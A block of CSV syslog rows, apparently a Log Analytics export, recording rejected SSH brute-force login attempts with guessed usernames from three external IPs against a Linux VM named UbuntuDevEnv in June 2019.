+4772,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:56:36,UbuntuDevEnv,2019-06-26 14:56:35,auth,UbuntuDevEnv,info,Invalid user sa from 47.254.147.170 port 50876,15193,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sa,47.254.147.1,50876,,
+4773,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:56:36,UbuntuDevEnv,2019-06-26 14:56:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,15193,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4774,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:56:36,UbuntuDevEnv,2019-06-26 14:56:35,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.254.147.170,15193,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.254.147.1,,0,
+4775,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:56:37,UbuntuDevEnv,2019-06-26 14:56:37,auth,UbuntuDevEnv,info,Failed password for invalid user sa from 47.254.147.170 port 50876 ssh2,15193,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sa,47.254.147.1,50876,,
+4776,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:56:37,UbuntuDevEnv,2019-06-26 14:56:37,auth,UbuntuDevEnv,info,Disconnected from invalid user sa 47.254.147.170 port 50876 [preauth],15193,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sa,47.254.147.1,50876,,
+4777,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:56:37,UbuntuDevEnv,2019-06-26 14:56:37,auth,UbuntuDevEnv,info,Received disconnect from 47.254.147.170 port 50876:11: Bye Bye [preauth],15193,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.254.147.1,50876,,
+4778,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:57:18,UbuntuDevEnv,2019-06-26 14:57:17,auth,UbuntuDevEnv,info,Invalid user sr from 220.134.138.111 port 50422,15336,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sr,220.134.138.1,50422,,
+4779,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:57:18,UbuntuDevEnv,2019-06-26 14:57:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,15336,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4780,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:57:18,UbuntuDevEnv,2019-06-26 14:57:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=220.134.138.111,15336,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,220.134.138.1,,0,
+4781,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:57:20,UbuntuDevEnv,2019-06-26 14:57:19,auth,UbuntuDevEnv,info,Failed password for invalid user sr from 220.134.138.111 port 50422 ssh2,15336,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sr,220.134.138.1,50422,,
+4782,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:57:20,UbuntuDevEnv,2019-06-26 14:57:20,auth,UbuntuDevEnv,info,Disconnected from invalid user sr 220.134.138.111 port 50422 [preauth],15336,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sr,220.134.138.1,50422,,
+4783,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:57:20,UbuntuDevEnv,2019-06-26 14:57:20,auth,UbuntuDevEnv,info,Received disconnect from 220.134.138.111 port 50422:11: Bye Bye [preauth],15336,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,220.134.138.1,50422,,
+4784,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:57:40,UbuntuDevEnv,2019-06-26 14:57:40,auth,UbuntuDevEnv,info,Invalid user jasper from 164.132.192.219 port 59380,15414,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jasper,164.132.192.2,59380,,
+4785,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:57:40,UbuntuDevEnv,2019-06-26 14:57:40,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,15414,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4786,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:57:40,UbuntuDevEnv,2019-06-26 14:57:40,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=164.132.192.219,15414,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,164.132.192.2,,0,
+4787,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:57:42,UbuntuDevEnv,2019-06-26 14:57:42,auth,UbuntuDevEnv,info,Failed password for invalid user jasper from 164.132.192.219 port 59380 ssh2,15414,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jasper,164.132.192.2,59380,,
+4788,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:57:42,UbuntuDevEnv,2019-06-26 14:57:42,auth,UbuntuDevEnv,info,Received disconnect from 164.132.192.219 port 59380:11: Bye Bye [preauth],15414,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,164.132.192.2,59380,,
+4789,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:57:42,UbuntuDevEnv,2019-06-26 14:57:42,auth,UbuntuDevEnv,info,Disconnected from invalid user jasper 164.132.192.219 port 59380 [preauth],15414,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jasper,164.132.192.2,59380,,
+4790,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:58:03,UbuntuDevEnv,2019-06-26 14:58:02,auth,UbuntuDevEnv,info,Invalid user qv from 47.254.147.170 port 39980,15497,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qv,47.254.147.1,39980,,
+4791,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:58:03,UbuntuDevEnv,2019-06-26 14:58:02,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.254.147.170,15497,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.254.147.1,,0,
+4792,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:58:03,UbuntuDevEnv,2019-06-26 14:58:02,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,15497,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4793,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:58:04,UbuntuDevEnv,2019-06-26 14:58:04,auth,UbuntuDevEnv,info,Failed password for invalid user qv from 47.254.147.170 port 39980 ssh2,15497,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qv,47.254.147.1,39980,,
+4794,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:58:04,UbuntuDevEnv,2019-06-26 14:58:04,auth,UbuntuDevEnv,info,Received disconnect from 47.254.147.170 port 39980:11: Bye Bye [preauth],15497,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.254.147.1,39980,,
+4795,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:58:04,UbuntuDevEnv,2019-06-26 14:58:04,auth,UbuntuDevEnv,info,Disconnected from invalid user qv 47.254.147.170 port 39980 [preauth],15497,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qv,47.254.147.1,39980,,
+4796,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:59:05,UbuntuDevEnv,2019-06-26 14:59:04,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=220.134.138.111  user=root,15715,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,220.134.138.1,,0,
+4797,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:59:07,UbuntuDevEnv,2019-06-26 14:59:06,auth,UbuntuDevEnv,info,Failed password for root from 220.134.138.111 port 39286 ssh2,15715,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,220.134.138.1,39286,,
+4798,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:59:07,UbuntuDevEnv,2019-06-26 14:59:07,auth,UbuntuDevEnv,info,Received disconnect from 220.134.138.111 port 39286:11: Bye Bye [preauth],15715,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,220.134.138.1,39286,,
+4799,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:59:07,UbuntuDevEnv,2019-06-26 14:59:07,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 220.134.138.111 port 39286 [preauth],15715,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,220.134.138.1,39286,,
+4800,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:59:10,UbuntuDevEnv,2019-06-26 14:59:09,auth,UbuntuDevEnv,info,Invalid user csgoserver from 164.132.192.219 port 39708,15734,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,csgoserver,164.132.192.2,39708,,
+4801,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:59:10,UbuntuDevEnv,2019-06-26 14:59:09,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=164.132.192.219,15734,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,164.132.192.2,,0,
+4802,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:59:10,UbuntuDevEnv,2019-06-26 14:59:09,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,15734,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4803,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:59:12,UbuntuDevEnv,2019-06-26 14:59:12,auth,UbuntuDevEnv,info,Failed password for invalid user csgoserver from 164.132.192.219 port 39708 ssh2,15734,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,csgoserver,164.132.192.2,39708,,
+4804,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:59:12,UbuntuDevEnv,2019-06-26 14:59:12,auth,UbuntuDevEnv,info,Received disconnect from 164.132.192.219 port 39708:11: Bye Bye [preauth],15734,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,164.132.192.2,39708,,
+4805,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:59:12,UbuntuDevEnv,2019-06-26 14:59:12,auth,UbuntuDevEnv,info,Disconnected from invalid user csgoserver 164.132.192.219 port 39708 [preauth],15734,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,csgoserver,164.132.192.2,39708,,
+4806,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:59:33,UbuntuDevEnv,2019-06-26 14:59:33,auth,UbuntuDevEnv,info,Invalid user scanner from 47.254.147.170 port 57302,15823,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,scanner,47.254.147.1,57302,,
+4807,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:59:33,UbuntuDevEnv,2019-06-26 14:59:33,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,15823,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4808,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:59:33,UbuntuDevEnv,2019-06-26 14:59:33,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.254.147.170,15823,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.254.147.1,,0,
+4809,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:59:36,UbuntuDevEnv,2019-06-26 14:59:35,auth,UbuntuDevEnv,info,Failed password for invalid user scanner from 47.254.147.170 port 57302 ssh2,15823,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,scanner,47.254.147.1,57302,,
+4810,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:59:36,UbuntuDevEnv,2019-06-26 14:59:35,auth,UbuntuDevEnv,info,Disconnected from invalid user scanner 47.254.147.170 port 57302 [preauth],15823,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,scanner,47.254.147.1,57302,,
+4811,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:59:36,UbuntuDevEnv,2019-06-26 14:59:35,auth,UbuntuDevEnv,info,Received disconnect from 47.254.147.170 port 57302:11: Bye Bye [preauth],15823,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.254.147.1,57302,,
+4812,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:00:40,UbuntuDevEnv,2019-06-26 15:00:39,auth,UbuntuDevEnv,info,Invalid user PMA from 164.132.192.219 port 48269,16140,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,PMA,164.132.192.2,48269,,
+4813,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:00:40,UbuntuDevEnv,2019-06-26 15:00:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,16140,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4814,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:00:40,UbuntuDevEnv,2019-06-26 15:00:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=164.132.192.219,16140,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,164.132.192.2,,0,
+4815,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:00:42,UbuntuDevEnv,2019-06-26 15:00:41,auth,UbuntuDevEnv,info,Failed password for invalid user PMA from 164.132.192.219 port 48269 ssh2,16140,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,PMA,164.132.192.2,48269,,
+4816,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:00:42,UbuntuDevEnv,2019-06-26 15:00:41,auth,UbuntuDevEnv,info,Received disconnect from 164.132.192.219 port 48269:11: Bye Bye [preauth],16140,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,164.132.192.2,48269,,
+4817,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:00:42,UbuntuDevEnv,2019-06-26 15:00:41,auth,UbuntuDevEnv,info,Disconnected from invalid user PMA 164.132.192.219 port 48269 [preauth],16140,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,PMA,164.132.192.2,48269,,
+4818,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:00:53,UbuntuDevEnv,2019-06-26 15:00:52,auth,UbuntuDevEnv,info,Invalid user reiner from 220.134.138.111 port 56386,16189,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,reiner,220.134.138.1,56386,,
+4819,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:00:53,UbuntuDevEnv,2019-06-26 15:00:52,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,16189,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4820,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:00:53,UbuntuDevEnv,2019-06-26 15:00:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=220.134.138.111,16189,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,220.134.138.1,,0,
+4821,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:00:54,UbuntuDevEnv,2019-06-26 15:00:54,auth,UbuntuDevEnv,info,Failed password for invalid user reiner from 220.134.138.111 port 56386 ssh2,16189,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,reiner,220.134.138.1,56386,,
+4822,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:00:54,UbuntuDevEnv,2019-06-26 15:00:54,auth,UbuntuDevEnv,info,Disconnected from invalid user reiner 220.134.138.111 port 56386 [preauth],16189,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,reiner,220.134.138.1,56386,,
+4823,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:00:54,UbuntuDevEnv,2019-06-26 15:00:54,auth,UbuntuDevEnv,info,Received disconnect from 220.134.138.111 port 56386:11: Bye Bye [preauth],16189,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,220.134.138.1,56386,,
+4824,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:01:04,UbuntuDevEnv,2019-06-26 15:01:04,auth,UbuntuDevEnv,info,Invalid user kjell from 47.254.147.170 port 46442,16233,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,kjell,47.254.147.1,46442,,
+4825,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:01:04,UbuntuDevEnv,2019-06-26 15:01:04,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.254.147.170,16233,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.254.147.1,,0,
+4826,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:01:04,UbuntuDevEnv,2019-06-26 15:01:04,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,16233,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4827,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:01:06,UbuntuDevEnv,2019-06-26 15:01:05,auth,UbuntuDevEnv,info,Failed password for invalid user kjell from 47.254.147.170 port 46442 ssh2,16233,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,kjell,47.254.147.1,46442,,
+4828,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:01:06,UbuntuDevEnv,2019-06-26 15:01:05,auth,UbuntuDevEnv,info,Disconnected from invalid user kjell 47.254.147.170 port 46442 [preauth],16233,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,kjell,47.254.147.1,46442,,
+4829,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:01:06,UbuntuDevEnv,2019-06-26 15:01:05,auth,UbuntuDevEnv,info,Received disconnect from 47.254.147.170 port 46442:11: Bye Bye [preauth],16233,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.254.147.1,46442,,
+4830,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:02:12,UbuntuDevEnv,2019-06-26 15:02:11,auth,UbuntuDevEnv,info,Invalid user filpx from 164.132.192.219 port 56828,16469,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,filpx,164.132.192.2,56828,,
+4831,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:02:12,UbuntuDevEnv,2019-06-26 15:02:11,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,16469,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
